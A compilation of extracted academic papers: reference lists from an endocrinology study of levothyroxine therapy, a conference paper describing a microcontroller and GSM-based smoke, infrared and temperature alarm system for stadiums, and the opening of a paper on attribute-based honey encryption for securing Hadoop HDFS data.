agency in the public, commercial or not-for-profit sector. Acknowledgements The authors are grateful to Hans-Günther Wahl, Institute of Laboratory Medicine, Klinikum Lüdenscheid, for measuring thyroid hormones. References 1 Bjoro T, Holmen J, Kruger O, Midthjell K, Hunstad K, Schreiner T, Sandnes L & Brochmann H. Prevalence of thyroid disease, thyroid dysfunction and thyroid peroxidase antibodies in a large, unselected population. The Health Study of Nord-Trondelag (HUNT). European Journal of Endocrinology 2000 143 639–647. (doi:10.1530/eje.0. 1430639) 2 Vanderpump MP, Tunbridge WM, French JM, Appleton D, Bates D, Clark F, Grimley Evans J, Hasan DM, Rodgers H & Tunbridge F. The incidence of thyroid disorders in the community: a twenty-year follow- up of the Whickham Survey. Clinical Endocrinology 1995 43 55–68. (doi:10.1111/j.1365-2265.1995.tb01894.x) 3 Roberts CGP & Ladenson PW. Hypothyroidism. Lancet 2004 363 793–803. (doi:10.1016/S0140-6736(04)15696-1) 4 Mandel SJ, Brent GA & Larsen PR. Levothyroxine therapy in patients with thyroid disease. Annals of Internal Medicine 1993 119 492–502. (doi:10.7326/0003-4819-119-6-199309150-00009) 5 Biondi B & Wartofsky L. Treatment with thyroid hormone. Endocrine Reviews 2014 35 433–512. (doi:10.1210/er.2013-1083) This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. http://dx.doi.org/10.1530/eje.0.1430639 http://dx.doi.org/10.1530/eje.0.1430639 http://dx.doi.org/10.1111/j.1365-2265.1995.tb01894.x http://dx.doi.org/10.1016/S0140-6736(04)15696-1 http://dx.doi.org/10.7326/0003-4819-119-6-199309150-00009 http://dx.doi.org/10.1210/er.2013-1083 http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ E n d o cr in e C o n n e ct io n s Research J E M Midgley et al. Response to L-T4 therapy 9–10 4 : 204 6 Bianco AC, Salvatore D, Gereben B, Berry MJ & Larsen PR. Biochemistry, cellular and molecular biology, and physiological roles of the iodothyronine selenodeiodinases. Endocrine Reviews 2002 23 38–89. (doi:10.1210/edrv.23.1.0455) 7 Pilo A, Iervasi G, Vitek F, Ferdeghini M, Cazzuola F & Bianchi R. Thyroidal and peripheral production of 3,5,30-triiodothyronine in humans by multicompartmental analysis. American Journal of Physiology. Endocrinology and Metabolism 1990 258 E715–E726. 8 Jonklaas J, Bianco AC, Bauer AJ, Burman KD, Cappola AR, Celi FS, Cooper DS, Kim BW, Peeters RP, Rosenthal MS et al. Guidelines for the treatment of hypothyroidism: prepared by the american thyroid association task force on thyroid hormone replacement. Thyroid 2014 24 1670–1751. (doi:10.1089/thy.2014.0028) 9 Baloch ZW, Carayon P, Conte-Devolx B, Demers LM, Feldt- Rasmussen U, Henry J-F, LiVosli VA, Niccoli-Sire P, John R, uf J et al. Laboratory medicine practice guidelines. Laboratory support for the diagnosis and monitoring of thyroid disease. Thyroid 2003 13 3–126. (doi:10.1089/105072503321086962) 10 Roos A, Linn-Rasker SP, van Domburg RT, Tijssen JP & Berghout A. The starting dose of levothyroxine in primary hypothyroidism treatment: a prospective, randomized, double-blind trial. Archives of Internal Medicine 2005 165 1714–1720. (doi:10.1001/archinte.165.15.1714) 11 Santini F, Pinchera A, Marsili A, Ceccarini G, Castagna MG, Valeriano R, Giannetti M, Taddei D, Centoni R, Scartabelli G et al. Lean body mass is a major determinant of levothyroxine dosage in the treatment of thyroid diseases. Journal of Clinical Endocrinology and Metabolism 2005 90 124–127. (doi:10.1210/jc.2004-1306) 12 Sukumar R, Agarwal A, Gupta S, Mishra A, Agarwal G, Verma AK & Mishra SK. Prediction of LT4 replacement dose to achieve euthyroidism in subjects undergoing total thyroidectomy for benign thyroid disorders. World Journal of Surgery 2010 34 527–531. (doi:10.1007/ s00268-009-0345-3) 13 Mistry D, Atkin S, Atkinson H, Gunasekaran S, Sylvester D, Rigby AS & England RJ. Predicting thyroxine requirements following total thyroidectomy. Clinical Endocrinology 2011 74 384–387. (doi:10.1111/ j.1365-2265.2010.03940.x) 14 Jin J, Allemang MT & McHenry CR. Levothyroxine replacement dosage determination after thyroidectomy. American Journal of Surgery 2013 205 360–363 discussion 363–364. (doi:10.1016/j.amjsurg.2012.10.015) 15 Ojomo KA, Schneider DF, Reiher AE, Lai N, Schaefer S, Chen H & Sippel RS. Using body mass index to predict optimal thyroid dosing after thyroidectomy. Journal of the American College of Surgeons 2013 216 454–460. (doi:10.1016/j.jamcollsurg.2012.12.002) 16 Di Donna V, Santoro MG, de Waure C, Ricciato MP, Paragliola RM, Pontecorvi A & Corsello SM. A new strategy to estimate levothyroxine requirement after total thyroidectomy for benign thyroid disease. Thyroid 2014 24 1759–1764. (doi:10.1089/thy.2014.0111) 17 Wiersinga WM. Paradigm shifts in thyroid hormone replacement therapies for hypothyroidism. Nature Reviews. Endocrinology 2014 10 164–174. (doi:10.1038/nrendo.2013.258) 18 Pepper GM & Casanova-Romero PY. Conversion to Armour thyroid from levothyroxine improved patient satisfaction in the treatment of hypothyroidism. Journal of Endocrinology, Diabetes & Obesity 2014 2 1055–1060. 19 Gullo D, Latina A, Frasca F, Le Moli R, Pellegriti G & Vigneri R. Levothyroxine monotherapy cannot guarantee euthyroidism in all athyreotic patients. PLoS ONE 2011 6 e22552. (doi:10.1371/journal. pone.0022552) 20 Hoermann R, Midgley JEM, Larisch R & Dietrich JW. Is pituitary TSH an adequate measure of thyroid hormone-controlled homoeostasis during thyroxine treatment? European Journal of Endocrinology 2013 168 271–280. (doi:10.1530/EJE-12-0819) 21 Midgley JEM, Hoermann R, Larisch R & Dietrich JW. Physiological states and functional relation between thyrotropin and free thyroxine in thyroid health and disease: in vivo and in silico data suggest a http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd hierarchical model. Journal of Clinical Pathology 2013 66 335–342. (doi:10.1136/jclinpath-2012-201213) 22 Hoermann R, Midgley JEM, Giacobino A, Eckl WA, Wahl HG, Dietrich JW & Larisch R. Homeostatic equilibria between free thyroid hormones and pituitary thyrotropin are modulated by various influences including age, body mass index and treatment. Clinical Endocrinology 2014 81 907–915. (doi:10.1111/ cen.12527) 23 Larisch R, Giacobino A, Eckl W, Wahl HG, Midgley JEM & Hoermann R. Reference range for thyrotropin. Post hoc assessment. Nuklearmedizin 2015 54 112–117. (doi:10.3413/Nukmed-0671-14-06) 24 Dietrich JW, Landgrafe G & Fotiadou EH. TSH and thyrotropic agonists: key actors in thyroid homeostasis. Journal of Thyroid Research 2012 2012 1–29. (doi:10.1155/2012/351864) 25 Fellows I. Deducer: a data analysis GUI for R. Journal of Statistical Software 2012 49 1–15. 26 R Core Team. R: A Language and Environment for Statistical Computing. R Foundation for Statistical Computing 2014. Vienna, Austria: R Foundation for Statistical Computing. (available at: http://www.R-project.org/) 27 Silva EJ, Gordon MB, Crantz FR, Leonard JL & Larsen PR. Qualitative and quantitative differences in the pathways of extrathyroidal triiodothyronine generation between euthyroid and hypothyroid rats. Journal of Clinical Investigation 1984 73 898–907. (doi:10.1172/ JCI111313) 28 Cettour-Rose P, Visser TJ, Burger AG & Rohner-Jeanrenaud F. Inhibition of pituitary type 2 deiodinase by reverse triiodothyronine does not alter thyroxine-induced inhibition of thyrotropin secretion in hypothyroid rats. European Journal of Endocrinology 2005 153 429–434. (doi:10.1530/ eje.1.01984) 29 Werneck de Castro JP, Fonseca TL, Ueta CB, McAninch EA, Abdalla SM, Wittmann G, Lechan RM, Gereben B & Bianco AC. Differences in hypothalamic type 2 deiodinase ubiquitination explain localized sensitivity to thyroxine. Journal of Clinical Investigation 2015 125 769–781. (doi:10.1172/JCI77588) 30 Hoermann R, Midgley JEM, Larisch R & Dietrich J. Integration of peripheral and glandular regulation of triiodothyronine production by thyrotropin in untreated and thyroxine-treated subjects. Hormone and Metabolic Research 2015 47 674–680. (doi:10.1055/s-0034-1398616) 31 Checchi S, Montanaro A, Pasqui L, Ciuoli C, De Palo V, Chiappetta MC & Pacini F. L-thyroxine requirement in patients with autoimmune hypothyroidism and parietal cell antibodies. Journal of Clinical Endocrinology and Metabolism 2008 93 465–469. (doi:10.1210/ jc.2007-1544) 32 Liwanpo L & Hershman JM. Conditions and drugs interfering with thyroxine absorption. Best Practice & Research. Clinical Endocrinology & Metabolism 2009 23 781–792. (doi:10.1016/j.beem. 2009.06.006) 33 Robertson HMA, Narayanaswamy AKP, Pereira O, Copland SA, Herriot R, McKinlay AW, Bevan JS & Abraham P. Factors contributing to high levothyroxine doses in primary hypothyroidism: an interventional audit of a large community database. Thyroid 2014 24 1765–1771. (doi:10.1089/thy.2013.0661) 34 Toft Kristensen T, Larsen J, Pedersen PL, Feldthusen A-D, Ellervik C, Jelstrup S & Kvetny J. Weight gain and serum TSH increase within the reference range after hemithyroidectomy indicate lowered thyroid function. Journal of Thyroid Research 2014 2014 892573. (doi:10.1155/ 2014/892573) 35 Fish LH, Schwartz HL, Cavanaugh J, Steffes MW, Bantle JP & Oppenheimer JH. Replacement dose, metabolism, and bioavailability of levothyroxine in the treatment of hypothyroidism. New England Journal of Medicine 1987 316 764–770. (doi:10.1056/ NEJM198703263161302) 36 Banovac K, Carrington SA, Levis S, Fill MD & Bilsker MS. Determination of replacement and suppressive doses of thyroxine. Journal of International Medical Research 1990 18 210–218. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. http://dx.doi.org/10.1210/edrv.23.1.0455 http://dx.doi.org/10.1089/thy.2014.0028 http://dx.doi.org/10.1089/105072503321086962 http://dx.doi.org/10.1001/archinte.165.15.1714 http://dx.doi.org/10.1210/jc.2004-1306 http://dx.doi.org/10.1007/s00268-009-0345-3 http://dx.doi.org/10.1007/s00268-009-0345-3 http://dx.doi.org/10.1111/j.1365-2265.2010.03940.x http://dx.doi.org/10.1111/j.1365-2265.2010.03940.x http://dx.doi.org/10.1016/j.amjsurg.2012.10.015 http://dx.doi.org/10.1016/j.jamcollsurg.2012.12.002 http://dx.doi.org/10.1089/thy.2014.0111 http://dx.doi.org/10.1038/nrendo.2013.258 http://dx.doi.org/10.1371/journal.pone.0022552 http://dx.doi.org/10.1371/journal.pone.0022552 http://dx.doi.org/10.1530/EJE-12-0819 http://dx.doi.org/10.1136/jclinpath-2012-201213 http://dx.doi.org/10.1111/cen.12527 http://dx.doi.org/10.1111/cen.12527 http://dx.doi.org/10.3413/Nukmed-0671-14-06 http://dx.doi.org/10.1155/2012/351864 http://www.R-project.org/ http://dx.doi.org/10.1172/JCI111313 http://dx.doi.org/10.1172/JCI111313 http://dx.doi.org/10.1530/eje.1.01984 http://dx.doi.org/10.1530/eje.1.01984 http://dx.doi.org/10.1172/JCI77588 http://dx.doi.org/10.1055/s-0034-1398616 http://dx.doi.org/10.1210/jc.2007-1544 http://dx.doi.org/10.1210/jc.2007-1544 http://dx.doi.org/10.1016/j.beem.2009.06.006 http://dx.doi.org/10.1016/j.beem.2009.06.006 http://dx.doi.org/10.1089/thy.2013.0661 http://dx.doi.org/10.1155/2014/892573 http://dx.doi.org/10.1155/2014/892573 http://dx.doi.org/10.1056/NEJM198703263161302 http://dx.doi.org/10.1056/NEJM198703263161302 http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ E n d o cr in e C o n n e ct io n s Research J E M Midgley et al. Response to L-T4 therapy 10–10 4 : 205 37 Gordon MB & Gordon MS. Variations in adequate levothyroxine replacement therapy in patients with different causes of hypothyroid- ism. Endocrine Practice 1999 5 233–238. (doi:10.4158/EP.5.5.233) 38 Baehr KM, Lyden E, Treude K, Erickson J & Goldner W. Levothyroxine dose following thyroidectomy is affected by more than just body weight. Laryngoscope 2012 122 834–838. (doi:10.1002/lary.23186) 39 de Lima JG, de Mesquita DJTM, da Costa Fernandes F, de Souza ABC, Santos Juniordos AC, Reboucas B, de Lima NN, Sousa AGP & Nobrega LHC. Comparison among the daily levothyroxine doses according to the etiology of hypothyroidism. Journal of Endocrinology and Metabolism 2013 3 1–6. (doi:10.4021/jem165w) 40 Abdalla SM & Bianco AC. Defending plasma T3 is a biological priority. Clinical Endocrinology 2014 81 633–641. (doi:10.1111/cen.12538) 41 Fonseca TL, Correa-Medina M, Campos MPO, Wittmann G, Werneck-de-Castro JP, Arrojo e Drigo R, Mora-Garzon M, Ueta CB, Caicedo A, Fekete C et al. Coordination of hypothalamic and pituitary T3 production regulates TSH expression. Journal of Clinical Investigation 2013 123 1492–1500. (doi:10.1172/JCI61231) 42 Hoftijzer HC, Heemstra KA, Visser TJ, le Cessie S, Peeters RP, Corssmit EPM & Smit JWA. The type 2 deiodinase ORFa-Gly3Asp polymorphism (rs12885300) influences the set point of the hypo- thalamus–pituitary–thyroid axis in patients treated for differentiated thyroid carcinoma. Journal of Clinical Endocrinology and Metabolism 2011 96 E1527–E1533. (doi:10.1210/jc.2011-0235) 43 Panicker V, Saravanan P, Vaidya B, Evans J, Hattersley AT, Frayling TM & Dayan CM. Common variation in the DIO2 gene predicts baseline psychological well-being and response to combination thyroxine plus http://www.endocrineconnections.org DOI: 10.1530/EC-150056 � 2015 The authors Published by Bioscientifica Ltd triiodothyronine therapy in hypothyroid patients. Journal of Clinical Endocrinology and Metabolism 2009 94 1623–1629. (doi:10.1210/ jc.2008-1301) 44 Taylor PN, Panicker V, Sayers A, Shields B, Iqbal A, Bremner AP, Beilby JP, Leedman PJ, Hattersley AT, Vaidya B et al. A meta-analysis of the associations between common variation in the PDE8B gene and thyroid hormone parameters, including assessment of longitudinal stability of associations over time and effect of thyroid hormone replacement. European Journal of Endocrinology 2011 164 773–780. (doi:10.1530/EJE-10-0938) 45 McAninch EA, Jo S, Preite NZ, Farkas E, Mohácsik P, Fekete C, Egri P, Gereben B, Li Y, eng Y et al. Prevalent polymorphism in thyroid hormone-activating enzyme leaves a genetic fingerprint that underlies associated clinical syndromes. Journal of Clinical Endocrinology and Metabolism 2015 100 920–933. (doi:10.1210/jc.2014-4092) 46 Wiersinga WM. Do we need still more trials on T4 and T3 combination therapy in hypothyroidism? European Journal of Endocrinology 2009 161 955–959. (doi:10.1530/EJE-09-0879) 47 Wiersinga WM, Duntas L, Fadeyev V, Nygaard B & Vanderpump MPJ. ETA guidelines: the use of L-T4CL-T3 in the treatment of hypothyroid- ism. European Thyroid Journal 2012 1 55–71. (doi:10.1159/000339444) 48 Watt T, Cramon P, Hegedüs L, Bjorner JB, Bonnema SJ, Rasmussen ÅK, Feldt-Rasmussen U & Groenvold M. The thyroid-related quality of life measure ThyPRO has good responsiveness and ability to detect relevant treatment effects. Journal of Clinical Endocrinology and Metabolism 2014 99 3708–3717. (doi:10.1210/jc.2014-1322) Received in final form 10 August 2015 Accepted 11 August 2015 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License. http://dx.doi.org/10.4158/EP.5.5.233 http://dx.doi.org/10.1002/lary.23186 http://dx.doi.org/10.4021/jem165w http://dx.doi.org/10.1111/cen.12538 http://dx.doi.org/10.1172/JCI61231 http://dx.doi.org/10.1210/jc.2011-0235 http://dx.doi.org/10.1210/jc.2008-1301 http://dx.doi.org/10.1210/jc.2008-1301 http://dx.doi.org/10.1530/EJE-10-0938 http://dx.doi.org/10.1210/jc.2014-4092 http://dx.doi.org/10.1530/EJE-09-0879 http://dx.doi.org/10.1159/000339444 http://dx.doi.org/10.1210/jc.2014-1322 http://www.endocrineconnections.org http://dx.doi.org/10.1530/EC-150056 http://creativecommons.org/licenses/by-nc/4.0/ http://creativecommons.org/licenses/by-nc/4.0/ Introduction Subjects and methods Outline placeholder Study design and objective Patients Laboratory methods FT3-FT4 ratio and calculated deiodinase activity Thyroid ultrasound and scintigraphy Statistical methods Results Discussion Declaration of interest Funding Acknowledgements References work_oxey5qpx5jcjpbuapq5ob57w2y ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 35 Multi-function Monitoring and Alarm System for the Large Stadium Wang Xiaohui School of Leisure Management Xi’an Eurasia University Xi’an, China e-mail: wangxiaohui@eurasia.edu Dou Xiaoning School of Leisure Management Xi’an Eurasia University Xi’an, China e-mail: douxiaoning@eurasia.edu Abstract—In the recent years, the safety problem in the large stadium has concerned by the researchers. Especially during the period of the large sport, the safety problem of the stadium has become an important public event. This paper designs a multi-function monitoring and alarm system based on the mobile communication network. It could realize the smoke or combustible gas alarm, the infrared identification detection and the temperature alarm. It collects the data through the sensor and sends the data to the mobile phone or the control platform. The system has the characteristics of simple, convenient, safety, various functions and low cost. Keywords-Sensor; Wireless Transmission; Alarm;, MCU; GSM I. INTRODUCTION For the safety problem of the large sports venues, this paper introduces a multi-function alarm system based on the wireless communication system[1]. It can realize the stadium smoke or combustible gas, the infrared detection and the temperature alarm. Through the sensor and the wireless communication module, the collected data was send to the user or the main control platform. The system includes the minimum system based on STC89C52, sensor circuit composed of the DS18B20, HC-SR501, MQ-2, GSM communication module and the LCD1602 display circuit. The software system includes the main program, the GSM SMS transceiver program, the display program and the temperature detection program[2]. II. OVERALL DESIGN OF THE SYSTEM A. The system function block The hardware system is composed by the smallest system of MCU, the GSM module, the display circuit, the buzzer control circuit and the sensor circuit[3]. The sensor circuit is composed of three parts: the smoke detection, the human infrared detection and the temperature detection. It is showed in Figure 1. Clock circuit Reset circuit STC89C52 MCU GSM Module Display circuit Sensor circuit Control circuit Buzzer alarm Smoke detection circuit Infrared detection circuit Temperature detection circuit Figure 1. System block diagram. From Figure 1, when the three sensors detect the smoke, the human body or the high temperature, the alarm information is sent to the microcontroller. The microcontroller detects the alarm by judging the threshold of the buzzer circuit. Then the GSM module sends the alarm message to the user. B. The design of the minimum system The minimum system of single chip microcomputer is composed of single chip microcomputer, crystal oscillator circuit and reset circuit[4]. As shown in Figure 2. 1 2 3 4 5 6 7 8 10 11 12 13 14 15 19 18 39 38 37 36 35 34 33 32 21 22 23 24 25 26 27 28 31 17 30 29 9 P11 P10 P13 P12 P15 P14 P17 P16 P30/RXD P34/T0 P31/TXD P32/INT0 P33/INT1 P35/T1 X1 RESET X2 P00 P01 P02 P03 P04 P05 P06 P07 P20 P21 P22 P23 P24 P25 P26 P27 EA/VPP RD/P37 WR/P36 ALE/PRDG 16 PSEN C3 22PF C1 30PF C2 30PF X1 12MHz L1 R1 4.7K STC89C52 + + + Figure 2. Minimum system of the single chip. The principle of reset circuit is to reset the program manually when pressing the button, reset the program, and 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 36 restart it. In the crystal oscillator circuit, X1 provides oscillating signal for the crystal oscillator to the microcontroller, and the MCU runs into the running program. C. Example Sensor detection circuit 1) Temperature detection. The temperature of the environment is collected by DS18B20 and the collected information is sent to the circuit through the interface. The temperature range is -55 ℃ ~+125℃. The increment is 0.5℃ and the temperature can be turned into a number. The MCU can read the temperature directly. This temperature sensor reduces the external circuit and makes it easier to realize[5]. The DS18B20 consists of four parts: the 64 bits ROM with the single-wire interface, the temperature sensor, the temperature trigger and the configuration register. Its structure is shown in Figure 3. Memory and controller 64 bits ROM and single-wire interface 8 Bits CRC generator Configuration register High temperature trigger Low temperature trigger Temperature sensor High speed cache memory Figure 3. The internal block of DS18B20. Through the single bus protocol, the single chip microcontroller reads the data and operations from the DS18B20. Finally it is concluded the temperature value. The resistor in the circuit used for the pull-up, it has the ability of the anti-interference. 2) Smoke and combustible gas detection. The MQ-2 smoke sensor is a kind of the air sensitive material with the tin oxide. It has the low conductivity in the clean air[6]. Therefore, in the surrounding environment, the conductivity of the sensor increases with the increase in the presence of the smoke or the combustible gas. LM393 is the operational amplifier which is used as a voltage comparator. When the input voltage V+ > V-, the output is high and the output is low when V- > V+. The MQ-2 is the smoke sensor. In MQ-2, R1 and RV2 constitute the circuit. RV1 is a sliding resistor which adjusts the input voltage of LM393. In general, when V+ >V-, outputs the high level. When the MQ-2 detects the smoke or the combustible gas, its resistance decreases and the voltage is smaller, the V- voltage changed higher, so that the V+<V-. The LM393 outputs the low level, the light emitting diode conducts. The single chip microcomputer detects the low level, so as to start the alarm. The detection circuit of the smoke and combustible gas is shown in Figure 4: 3 2 1 LM393 OUT1 + - GND 4 VCC 5 RV1 10K R3 10K R2 510 RV2 10K R7 4.7K D1 C1 104 A H A B H B MQ-2 VCC VCC Figure 4. The circuit of the smoke and the combustible gas. 3) Human infrared detection With the HC-SR501 module, the system detects the human body. When the human body passes through the infrared detection zone, the MCU outputs the trigger signal to the wireless module. When no one is unmanned, the MCU is used to detect the high level through the pull resistance[7]. 2 1 HC-SR501 A0 GND 3 C1 104 A1 R1 510 SW1 R2 10K 1K R3 Q1 NPN D2 VCC Figure 5. The infrared detection circuit. HC-SR501 is the human body induction module. When it detects the human body, pin A1 outputs the high level. Through the current limiting resistor, Q1 turns on and the collector connects to the GND and then switched to the low level. At this time, the light emitting diode conducts and the LED lighting. The single chip microcomputer detects the low level and begins an alarm. In the circuit, the capacitance used as the filter, R2 is the pull-up resistor. When there is no person, the Q1 turns off. The single chip microcomputer can detect the high level by the pull-up resistor. III. SOFTWARE SYSTEM DESIGN A. Main program design The software of this system is designed with a single chip system program as the main program, and the sensor module 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 37 program is designed as the subroutine[8]. The main program flow is shown in Figure 6. Start MCU Initialization Module Initialization Smoke Detection Detected Smoke (Y/N) Send SMS Y End Detected Human (Y/N) Send SMS Send SMS Y Y N Temperature Detection Temperature >Threshold Infrared Detection N N Figure 6. Main program of the systemm. At first, the MCU initializes and then the temperature module, the human infrared module and the smoke alarm module are also initialized. If the system detects the smoke, sends the message to the mobile phone or determines whether the temperature exceeds the threshold value. If it exceeds it, send data to the user or judge the results of the human detected. If detects the human body sends the data to the mobile phone or not. B. GSM module program design The program design of this part is the design of serial communication of GSM[9]. First, port, baud rate, parity bit, data bit and so on are first set up, then the short message is sent by TC35 AT command. The flow of its program is shown in Figure 7. Start MCU iniatialization Module iniatialization COM interrupt End receive“RING” Send the command“ATH” Delay Send message Receive #OPEN# Relay turn on LED turn on Receive #CLOSE# Relay turn off LED turn off Y N N N N Y Y Y Figure 7. TC35 module program flow chart. The program began, GSM module initialization, serial port to determine whether to interrupt if the serial interrupt, and then determine whether to receive the "RING" command, if the received command is sent on command, if not to receive orders and then to determine whether the received switch command, if the #OPEN# is received, the control relay is closed, LED lights, if received the #CLOSE# command, control relay off, LED lamp. IV. TEST RESULT AND DATA ANALYSIS When the system detects the data exceeds the threshold, the GSM module begin works. It send SMS to the user or the main platform, which could transmit the data in time. In order to display the test results, uses the screen results of the mobile phone in Figure 8. Figure 8. GSM sending SMS. Users can send “OPEN” and “CLOSE” command to control the working status of the system. If the “OPEN” 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 38 command is send, the LED turns on. When sending “CLOSE” command the LED turns off. It proved the GSM module could receive short message successfully. The test result is shown in Figure 9. Figure 9. GSM receiving SMS V. CONCLUSIONS In this paper, the multi-function alarm system could detect the smoke or combustible gas, the infrared identification and the temperature by the multi-point sensor in the large stadium. The collected data transmitted by the mobile communication to the mobile phone or the main platform. The system is simple and cheap, it has various functions for the monitoring system conveniently. ACKNOWLEDGMENT This work was partly supported by Shaanxi Province Social Science Fund Project (NO.2016R022) of China and by the scientific research fund project of Shaanxi Provincial Department of Education (17JK1036). REFERENCES [1] F.Cappella, V.Caracciolo, and R.Cerulli, et al. “The calibration and the monitoring/alarm system”, International Journal of Modern Physics A, vol. 31, Nov. 2016, pp.1-8, doi:org/10.1142/S0217751X16420045 [2] T.Hamaguchi, H.Sakashita, and H.Moritani, et al. “Method for Designing Alarm System Using DAEs, CE Matrices, and Preference Indices”, Journal of Chemical Engineering of Japan, vol.50, Jun,2017, pp.439-444, doi:org/10.1252/jcej.16we365 [3] S.Romero-Brufau, B. W.Morlan, and M.Johnson, et al. “Evaluating Automated Rules for Rapid Response System Alarm Triggers in Medical and Surgical Patients”, Journal of Hospital Medicine, vol.23, Nov.2017, pp.217-223,doi: 10.12788/jhm.2712. [4] Y.Jie, H.Zhu, and X.Cao. “One-Piece Triboelectric Nanosensor for Self-Triggered Alarm System and Latent Fingerprint Detection”, Acs Nano, vol.11, Oct. 2016, pp.10366-10372, doi:10.1021/acsnano.6b06100. [5] Y.Jiang, G.Li, and J.Wang . “Photoacoustic Compound Fire Alarm System for Detecting Particles and Carbon Monoxide in Smoke”, Fire Technology, vol.52,May.2016, pp.1255-1269, doi:org/10.1007/s10694-015-0542-6. [6] S.Fong, R.Wong, and A. V.Vasilakos. “Accelerated PSO Swarm Search Feature Selection for Data Stream Mining Big Data”, IEEE Transactions on Services Computing, vol.9, Dec.2016, pp.33-45, doi:10.1109/TSC.2015.2439695. [7] A. O.Gaca, P.Kudrin, and C.Colomer-Winter, et al. “From (p)ppGpp to (pp)pGpp: Characterization of Regulatory Effects of pGpp Synthesized by the Small Alarmone Synthetase of Enterococcus faecalis”, Journal of Bacteriology, vol.197, Oct.2015, pp.2908.doi:10.1128/JB.00324-15. [8] T.Jones, L.Glass, and S.Gandhi, et al. “Madagascar's Mangroves: Quantifying Nation-Wide and Ecosystem Specific Dynamics, and Detailed Contemporary Mapping of Distinct Ecosystems”, Remote Sensing, vol.8,Feb.2016, pp.106,doi:10.3390/rs8020106. [9] A. S.Crunchant, M.Egerer, and A.Loos, et al. “Automated face detection for occurrence and occupancy estimation in chimpanzees”, American Journal of Primatology, vol.79,May.2017, pp.1- 12.doi:10.1002/ajp.22627. https://doi.org/10.1142/S0217751X16420045 https://doi.org/10.1252/jcej.16we365 https://doi.org/10.1021/acsnano.6b06100 https://doi.org/10.1109/TSC.2015.2439695 http://dx.doi.org/10.1128/JB.00324-15 http://dx.doi.org/10.3390/rs8020106 http://dx.doi.org/10.1002/ajp.22627 work_oxyhki32wvhqhkc7hia2kg2azu ---- Submitted 22 May 2019 Accepted 21 January 2020 Published 17 February 2020 Corresponding authors Gayatri Kapil, gayatri1258@gmail.com Rajeev Kumar, rs0414@gmail.com Academic editor Shlomi Dolev Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.259 Copyright 2020 Kapil et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Attribute based honey encryption algorithm for securing big data: Hadoop distributed file system perspective Gayatri Kapil1, Alka Agrawal1, Abdulaziz Attaallah2, Abdullah Algarni2, Rajeev Kumar1 and Raees Ahmad Khan1 1 Information Technology, Babasaheb Bhimrao Ambedkar University, Lucknow, Uttar Pradesh, India 2 Faculty of Computing and Information Technology, King Abdulaziz University, Jeddah, Saudi Arabia ABSTRACT Hadoop has become a promising platform to reliably process and store big data. It provides flexible and low cost services to huge data through Hadoop Distributed File System (HDFS) storage. Unfortunately, absence of any inherent security mechanism in Hadoop increases the possibility of malicious attacks on the data processed or stored through Hadoop. In this scenario, securing the data stored in HDFS becomes a challenging task. Hence, researchers and practitioners have intensified their efforts in working on mechanisms that would protect user’s information collated in HDFS. This has led to the development of numerous encryption-decryption algorithms but their performance decreases as the file size increases. In the present study, the authors have enlisted a methodology to solve the issue of data security in Hadoop storage. The authors have integrated Attribute Based Encryption with the honey encryption on Hadoop, i.e., Attribute Based Honey Encryption (ABHE). This approach works on files that are encoded inside the HDFS and decoded inside the Mapper. In addition, the authors have evaluated the proposed ABHE algorithm by performing encryption- decryption on different sizes of files and have compared the same with existing ones including AES and AES with OTP algorithms. The ABHE algorithm shows considerable improvement in performance during the encryption-decryption of files. Subjects Cryptography, Security and Privacy Keywords Big data, Data security, And encryption-decryption, HDFS, Hadoop, Cloud storage INTRODUCTION Data security has now become one of the top most concerns for any individual or organization. Day by day, substantial amount of information is transferred through digital applications which require heaps of extra storage space, processing assets and dynamic framework execution. The exponential use of smart phones, social networking sites, downloaded apps, web sensor are generating huge amount of data. This has led to several issues in big data including storage customization, security, cost-effectiveness, smooth performance, vendor lock-in, and compliance. All these issues have their importance in Hadoop. However, big data security and privacy has become the burning issue for Hadoop HDFS data storage and distributed computing. This study essentially focuses on ensuring security and privacy for big data at the storage level. How to cite this article Kapil G, Agrawal A, Attaallah A, Algarni A, Kumar R, Khan RA. 2020. Attribute based honey encryption algo- rithm for securing big data: Hadoop distributed file system perspective. PeerJ Comput. Sci. 6:e259 http://doi.org/10.7717/peerj-cs.259 https://peerj.com/computer-science mailto:gayatri1258@gmail.com mailto:rs0414@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.259 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.259 When utilizing the Hadoop HDFS data storage service, clients have no compelling reason to store information locally and thus convey it constantly. As is the usual norm, the information is kept on the Hadoop HDFS storage server to ensure that clients can access a given information as per their convenience, irrespective of the time and place they choose to avail it from. The Hadoop HDFS storage server provides both hardware allocation and information security assurance. As long as the clients are connected with the internet, they get their information easily. Hadoop is an on-going innovation which is utilized as a system for the huge information storage. It is an open source execution of the structure dependent on java. Hadoop is utilized in a substantial bunch or as an open cloud administration. This process is termed as the standard conveyance parallel processing framework (Polato et al., 2014). The versatility of Hadoop is evident by its ubiquitious use, yet Hadoop is devoid of effective mechanisms to ward off security breaches of the data stored in HDFS As Hadoop provides no inherent security for the information stored in it, numerous methods and approaches for securing the stored HDFS files have been explored by various researchers and practitioners. Among all these efforts, encryption seems to be the most promising answer for securing information in HDFS that is kept in DataNodes as well as for securely exchanging datafrom one DataNode to another DataNode while executing MapReduce jobs. Encryption techniques can considerably reduce the security breaches and data infringement in Hadoop environment. However, the results obtained through various encryption algorithms have demonstrated that the document sizes of the original files can be extended to about one and a half. Further, the uploading as well as the downloading time of a given file can also be increased. Hence, to adress these concerns, the researchers of this study have propositioned a 